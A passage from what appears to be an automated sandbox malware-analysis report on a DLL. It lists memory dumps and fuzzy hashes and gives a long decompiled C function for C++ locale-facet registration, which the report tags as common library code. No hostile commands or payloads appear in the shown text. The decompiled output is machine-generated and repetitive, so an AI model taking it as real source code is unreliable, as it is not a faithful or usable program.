                          • int.LIBCPMT ref: 6E20A127
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • ctype.LIBCPMT ref: 6E20A14A
                          • std::_Facet_Register.LIBCPMT ref: 6E20A161
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A181
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A19F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
                          • String ID: 8k,n
                          • API String ID: 1394824916-3277982818
                          • Opcode ID: dfef0be74a9ee87519e02a32c5871714b09756194fae8221ac19bc58ee90b160
                          • Instruction ID: b6c44b0feb4037195d911b7b5e00fb8f9856d6b3a6d158228e63df7fbba6607d
                          • Opcode Fuzzy Hash: dfef0be74a9ee87519e02a32c5871714b09756194fae8221ac19bc58ee90b160
                          • Instruction Fuzzy Hash: A011A3B5A1051D9BCF01DBE4C898AEDB77BAF44B14F140919E4106B2D0DFB49A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t858 - 0x14, 0);
				_t819 =  *0x6e2c6dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6E1E161C(0x6e2c6b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6E2066BA(_t858 - 0x14);
					return E6E220075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6E210E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t858 - 0x20);
							E6E223D74(_t858 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t799, _t819, 0x14);
							E6E206653(_t858 - 0x14, 0);
							_t820 =  *0x6e2c6de8; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6E1E161C(0x6e2c6d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6E2066BA(_t858 - 0x14);
								return E6E220075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6E210EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t858 - 0x20);
										E6E223D74(_t858 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t606, _t800, _t820, 0x14);
										E6E206653(_t858 - 0x14, 0);
										_t821 =  *0x6e2c6db8; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6E1E161C(0x6e2c6d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6E2066BA(_t858 - 0x14);
											return E6E220075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6E210F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t858 - 0x20);
													E6E223D74(_t858 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t606, _t801, _t821, 0x14);
													E6E206653(_t858 - 0x14, 0);
													_t822 =  *0x6e2c6dec; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6E1E161C(0x6e2c6d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6E2066BA(_t858 - 0x14);
														return E6E220075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6E210F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t858 - 0x20);
																E6E223D74(_t858 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t606, _t802, _t822, 0x14);
																E6E206653(_t858 - 0x14, 0);
																_t823 =  *0x6e2c6dbc; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6E1E161C(0x6e2c6d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6E2066BA(_t858 - 0x14);
																	return E6E220075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6E210FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t858 - 0x20);
																			E6E223D74(_t858 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t606, _t803, _t823, 0x14);
																			E6E206653(_t858 - 0x14, 0);
																			_t824 =  *0x6e2c6df0; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6E1E161C(0x6e2c6d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6E2066BA(_t858 - 0x14);
																				return E6E220075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6E211057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t858 - 0x20);
																						E6E223D74(_t858 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t606, _t804, _t824, 0x14);
																						E6E206653(_t858 - 0x14, 0);
																						_t825 =  *0x6e2c6dc0; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6E1E161C(0x6e2c6d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6E2066BA(_t858 - 0x14);
																							return E6E220075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6E2110BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t858 - 0x20);
																									E6E223D74(_t858 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t606, _t805, _t825, 0x14);
																									E6E206653(_t858 - 0x14, 0);
																									_t826 =  *0x6e2c6df8; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6E1E161C(0x6e2c6da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6E2066BA(_t858 - 0x14);
																										return E6E220075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6E211127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t858 - 0x20);
																												E6E223D74(_t858 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t606, _t806, _t826, 0x14);
																												E6E206653(_t858 - 0x14, 0);
																												_t827 =  *0x6e2c6df4; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6E1E161C(0x6e2c6da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6E2066BA(_t858 - 0x14);
																													return E6E220075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6E2111AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t858 - 0x20);
																															E6E223D74(_t858 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t606, _t807, _t827, 0x14);
																															E6E206653(_t858 - 0x14, 0);
																															_t828 =  *0x6e2c6dc8; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6E1E161C(0x6e2c6d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6E2066BA(_t858 - 0x14);
																																return E6E220075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6E211230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t858 - 0x20);
																																		E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t606, _t808, _t828, 0x14);
																																		E6E206653(_t858 - 0x14, 0);
																																		_t829 =  *0x6e2c6dc4; // 0x0
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6E1E161C(0x6e2c6d78);
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
																																		_t809 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t409);
																																		__eflags = _t809;
																																		if(_t809 != 0) {
																																			L75:
																																			E6E2066BA(_t858 - 0x14);
																																			return E6E220075(_t809);
																																		} else {
																																			__eflags = _t829;
																																			if(_t829 == 0) {
																																				_push( *((intOrPtr*)(_t858 + 8)));
																																				_push(_t858 - 0x10);
																																				__eflags = E6E2112B4(_t606, _t679, _t797, _t809, _t829) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t858 - 0x20);
																																					E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t606, _t809, _t829, 0x14);
																																					E6E206653(_t858 - 0x14, 0);
																																					_t830 =  *0x6e2c6dd8; // 0x0
																																					 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																					 *(_t858 - 0x10) = _t830;
																																					_t422 = E6E1E161C(0x6e2c6d84);
																																					_t686 =  *((intOrPtr*)(_t858 + 8));
																																					_t810 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t422);
																																					__eflags = _t810;
																																					if(_t810 != 0) {
																																						L82:
																																						E6E2066BA(_t858 - 0x14);
																																						return E6E220075(_t810);
																																					} else {
																																						__eflags = _t830;
																																						if(_t830 == 0) {
																																							_push( *((intOrPtr*)(_t858 + 8)));
																																							_push(_t858 - 0x10);
																																							__eflags = E6E211339(_t606, _t686, _t797, _t810, _t830) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t858 - 0x20);
																																								E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t606, _t810, _t830, 0x14);
																																								E6E206653(_t858 - 0x14, 0);
																																								_t831 =  *0x6e2c6db0; // 0x0
																																								 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																								 *(_t858 - 0x10) = _t831;
																																								_t435 = E6E1E161C(0x6e2c6d64);
																																								_t693 =  *((intOrPtr*)(_t858 + 8));
																																								_t811 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t435);
																																								__eflags = _t811;
																																								if(_t811 != 0) {
																																									L89:
																																									E6E2066BA(_t858 - 0x14);
																																									return E6E220075(_t811);
																																								} else {
																																									__eflags = _t831;
																																									if(_t831 == 0) {
																																										_push( *((intOrPtr*)(_t858 + 8)));
																																										_push(_t858 - 0x10);
																																										__eflags = E6E2113A1(_t606, _t693, _t797, _t811, _t831) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t858 - 0x20);
																																											E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t606, _t811, _t831, 0x14);
																																											E6E206653(_t858 - 0x14, 0);
																																											_t832 =  *0x6e2c6ddc; // 0x0
																																											 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																											 *(_t858 - 0x10) = _t832;
																																											_t448 = E6E1E161C(0x6e2c6d88);
																																											_t700 =  *((intOrPtr*)(_t858 + 8));
																																											_t812 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t448);
																																											__eflags = _t812;
																																											if(_t812 != 0) {
																																												L96:
																																												E6E2066BA(_t858 - 0x14);
																																												return E6E220075(_t812);
																																											} else {
																																												__eflags = _t832;
																																												if(_t832 == 0) {
																																													_push( *((intOrPtr*)(_t858 + 8)));
																																													_push(_t858 - 0x10);
																																													__eflags = E6E211409(_t606, _t700, _t797, _t812, _t832) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t858 - 0x20);
																																														E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t606, _t812, _t832, 0x14);
																																														E6E206653(_t858 - 0x14, 0);
																																														_t833 =  *0x6e2c6de0; // 0x0
																																														 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																														 *(_t858 - 0x10) = _t833;
																																														_t461 = E6E1E161C(0x6e2c6d8c);
																																														_t707 =  *((intOrPtr*)(_t858 + 8));
																																														_t813 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t461);
																																														__eflags = _t813;
																																														if(_t813 != 0) {
																																															L103:
																																															E6E2066BA(_t858 - 0x14);
																																															return E6E220075(_t813);
																																														} else {
																																															__eflags = _t833;
																																															if(_t833 == 0) {
																																																_push( *((intOrPtr*)(_t858 + 8)));
																																																_push(_t858 - 0x10);
																																																__eflags = E6E211471(_t606, _t707, _t797, _t813, _t833) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t858 - 0x20);
																																																	E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t606, _t813, _t833, 0x14);
																																																	E6E206653(_t858 - 0x14, 0);
																																																	_t834 =  *0x6e2c6dfc; // 0x0
																																																	 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																	 *(_t858 - 0x10) = _t834;
																																																	_t474 = E6E1E161C(0x6e2c6da8);
																																																	_t714 =  *((intOrPtr*)(_t858 + 8));
																																																	_t814 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t474);
																																																	__eflags = _t814;
																																																	if(_t814 != 0) {
																																																		L110:
																																																		E6E2066BA(_t858 - 0x14);
																																																		return E6E220075(_t814);
																																																	} else {
																																																		__eflags = _t834;
																																																		if(_t834 == 0) {
																																																			_push( *((intOrPtr*)(_t858 + 8)));
																																																			_push(_t858 - 0x10);
																																																			__eflags = E6E2114EC(_t606, _t714, _t797, _t814, _t834) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t858 - 0x20);
																																																				E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t606, _t814, _t834, 0x14);
																																																				E6E206653(_t858 - 0x14, 0);
																																																				_t835 =  *0x6e2c6dcc; // 0x0
																																																				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																				 *(_t858 - 0x10) = _t835;
																																																				_t487 = E6E1E161C(0x6e2c6d80);
																																																				_t721 =  *((intOrPtr*)(_t858 + 8));
																																																				_t815 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t487);
																																																				__eflags = _t815;
																																																				if(_t815 != 0) {
																																																					L117:
																																																					E6E2066BA(_t858 - 0x14);
																																																					return E6E220075(_t815);
																																																				} else {
																																																					__eflags = _t835;
																																																					if(_t835 == 0) {
																																																						_push( *((intOrPtr*)(_t858 + 8)));
																																																						_push(_t858 - 0x10);
																																																						__eflags = E6E211558(_t606, _t721, _t797, _t815, _t835) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t858 - 0x20);
																																																							E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e2683cf, _t606, _t815, _t835, 0x14);
																																																							E6E206653(_t858 - 0x14, 0);
																																																							_t836 =  *0x6e2c6e00; // 0x0
																																																							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																							 *(_t858 - 0x10) = _t836;
																																																							_t500 = E6E1E161C(0x6e2c6dac);
																																																							_t728 =  *((intOrPtr*)(_t858 + 8));
																																																							_t816 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t500);
																																																							__eflags = _t816;
																																																							if(_t816 != 0) {
																																																								L124:
																																																								E6E2066BA(_t858 - 0x14);
																																																								return E6E220075(_t816);
																																																							} else {
																																																								__eflags = _t836;
																																																								if(_t836 == 0) {
																																																									_push( *((intOrPtr*)(_t858 + 8)));
																																																									_push(_t858 - 0x10);
																																																									__eflags = E6E2115C4(_t606, _t728, _t797, _t816, _t836) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1E1438(_t858 - 0x20);
																																																										E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e2683cf, _t606, _t816, _t836, 0x14);
																																																										E6E206653(_t858 - 0x14, 0);
																																																										_t837 =  *0x6e2c6dd0; // 0x0
																																																										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																										 *(_t858 - 0x10) = _t837;
																																																										_t513 = E6E1E161C(0x6e2c6d60);
																																																										_t735 =  *((intOrPtr*)(_t858 + 8));
																																																										_t817 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t513);
																																																										__eflags = _t817;
																																																										if(_t817 != 0) {
																																																											L131:
																																																											E6E2066BA(_t858 - 0x14);
																																																											return E6E220075(_t817);
																																																										} else {
																																																											__eflags = _t837;
																																																											if(_t837 == 0) {
																																																												_push( *((intOrPtr*)(_t858 + 8)));
																																																												_push(_t858 - 0x10);
																																																												__eflags = E6E21162A(_t606, _t735, _t797, _t817, _t837) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													_t739 = _t858 - 0x20;
																																																													E6E1E1438(_t739);
																																																													E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																													asm("int3");
																																																													E6E2200AC(0x6e26851f, _t606, _t817, _t837, 4);
																																																													_t838 = _t739;
																																																													 *(_t858 - 0x10) = _t838;
																																																													 *((intOrPtr*)(_t838 + 4)) =  *((intOrPtr*)(_t858 + 0xc));
																																																													_push( *((intOrPtr*)(_t858 + 0x14)));
																																																													_t273 = _t858 - 4;
																																																													 *_t273 =  *(_t858 - 4) & 0x00000000;
																																																													__eflags =  *_t273;
																																																													 *_t838 = 0x6e26c0c4;
																																																													 *((char*)(_t838 + 0x28)) =  *((intOrPtr*)(_t858 + 0x10));
																																																													E6E21542F(_t606, _t739, _t797, _t817, _t838,  *_t273);
																																																													return E6E220075(_t838,  *((intOrPtr*)(_t858 + 8)));
																																																												} else {
																																																													_t817 =  *(_t858 - 0x10);
																																																													 *(_t858 - 0x10) = _t817;
																																																													 *(_t858 - 4) = 1;
																																																													E6E206FD3(__eflags, _t817);
																																																													 *0x6e26a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t817 + 4))))();
																																																													 *0x6e2c6dd0 = _t817;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t817 = _t837;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t816 =  *(_t858 - 0x10);
																																																										 *(_t858 - 0x10) = _t816;
																																																										 *(_t858 - 4) = 1;
																																																										E6E206FD3(__eflags, _t816);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t816 + 4))))();
																																																										 *0x6e2c6e00 = _t816;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t816 = _t836;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t815 =  *(_t858 - 0x10);
																																																							 *(_t858 - 0x10) = _t815;
																																																							 *(_t858 - 4) = 1;
																																																							E6E206FD3(__eflags, _t815);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t815 + 4))))();
																																																							 *0x6e2c6dcc = _t815;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t815 = _t835;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t814 =  *(_t858 - 0x10);
																																																				 *(_t858 - 0x10) = _t814;
																																																				 *(_t858 - 4) = 1;
																																																				E6E206FD3(__eflags, _t814);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t814 + 4))))();
																																																				 *0x6e2c6dfc = _t814;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t814 = _t834;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t813 =  *(_t858 - 0x10);
																																																	 *(_t858 - 0x10) = _t813;
																																																	 *(_t858 - 4) = 1;
																																																	E6E206FD3(__eflags, _t813);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t813 + 4))))();
																																																	 *0x6e2c6de0 = _t813;
																																																	goto L103;
																																																}
																																															} else {
																																																_t813 = _t833;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t812 =  *(_t858 - 0x10);
																																														 *(_t858 - 0x10) = _t812;
																																														 *(_t858 - 4) = 1;
																																														E6E206FD3(__eflags, _t812);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t812 + 4))))();
																																														 *0x6e2c6ddc = _t812;
																																														goto L96;
																																													}
																																												} else {
																																													_t812 = _t832;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t811 =  *(_t858 - 0x10);
																																											 *(_t858 - 0x10) = _t811;
																																											 *(_t858 - 4) = 1;
																																											E6E206FD3(__eflags, _t811);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t811 + 4))))();
																																											 *0x6e2c6db0 = _t811;
																																											goto L89;
																																										}
																																									} else {
																																										_t811 = _t831;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t810 =  *(_t858 - 0x10);
																																								 *(_t858 - 0x10) = _t810;
																																								 *(_t858 - 4) = 1;
																																								E6E206FD3(__eflags, _t810);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t810 + 4))))();
																																								 *0x6e2c6dd8 = _t810;
																																								goto L82;
																																							}
																																						} else {
																																							_t810 = _t830;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t809 =  *(_t858 - 0x10);
																																					 *(_t858 - 0x10) = _t809;
																																					 *(_t858 - 4) = 1;
																																					E6E206FD3(__eflags, _t809);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t809 + 4))))();
																																					 *0x6e2c6dc4 = _t809;
																																					goto L75;
																																				}
																																			} else {
																																				_t809 = _t829;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t808 =  *(_t858 - 0x10);
																																		 *(_t858 - 0x10) = _t808;
																																		 *(_t858 - 4) = 1;
																																		E6E206FD3(__eflags, _t808);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t808 + 4))))();
																																		 *0x6e2c6dc8 = _t808;
																																		goto L68;
																																	}
																																} else {
																																	_t808 = _t828;
																																	goto L68;
																																}
																															}
																														} else {
																															_t807 =  *(_t858 - 0x10);
																															 *(_t858 - 0x10) = _t807;
																															 *(_t858 - 4) = 1;
																															E6E206FD3(__eflags, _t807);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t807 + 4))))();
																															 *0x6e2c6df4 = _t807;
																															goto L61;
																														}
																													} else {
																														_t807 = _t827;
																														goto L61;
																													}
																												}
																											} else {
																												_t806 =  *(_t858 - 0x10);
																												 *(_t858 - 0x10) = _t806;
																												 *(_t858 - 4) = 1;
																												E6E206FD3(__eflags, _t806);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t806 + 4))))();
																												 *0x6e2c6df8 = _t806;
																												goto L54;
																											}
																										} else {
																											_t806 = _t826;
																											goto L54;
																										}
																									}
																								} else {
																									_t805 =  *(_t858 - 0x10);
																									 *(_t858 - 0x10) = _t805;
																									 *(_t858 - 4) = 1;
																									E6E206FD3(__eflags, _t805);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t805 + 4))))();
																									 *0x6e2c6dc0 = _t805;
																									goto L47;
																								}
																							} else {
																								_t805 = _t825;
																								goto L47;
																							}
																						}
																					} else {
																						_t804 =  *(_t858 - 0x10);
																						 *(_t858 - 0x10) = _t804;
																						 *(_t858 - 4) = 1;
																						E6E206FD3(__eflags, _t804);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t804 + 4))))();
																						 *0x6e2c6df0 = _t804;
																						goto L40;
																					}
																				} else {
																					_t804 = _t824;
																					goto L40;
																				}
																			}
																		} else {
																			_t803 =  *(_t858 - 0x10);
																			 *(_t858 - 0x10) = _t803;
																			 *(_t858 - 4) = 1;
																			E6E206FD3(__eflags, _t803);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t803 + 4))))();
																			 *0x6e2c6dbc = _t803;
																			goto L33;
																		}
																	} else {
																		_t803 = _t823;
																		goto L33;
																	}
																}
															} else {
																_t802 =  *(_t858 - 0x10);
																 *(_t858 - 0x10) = _t802;
																 *(_t858 - 4) = 1;
																E6E206FD3(__eflags, _t802);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t802 + 4))))();
																 *0x6e2c6dec = _t802;
																goto L26;
															}
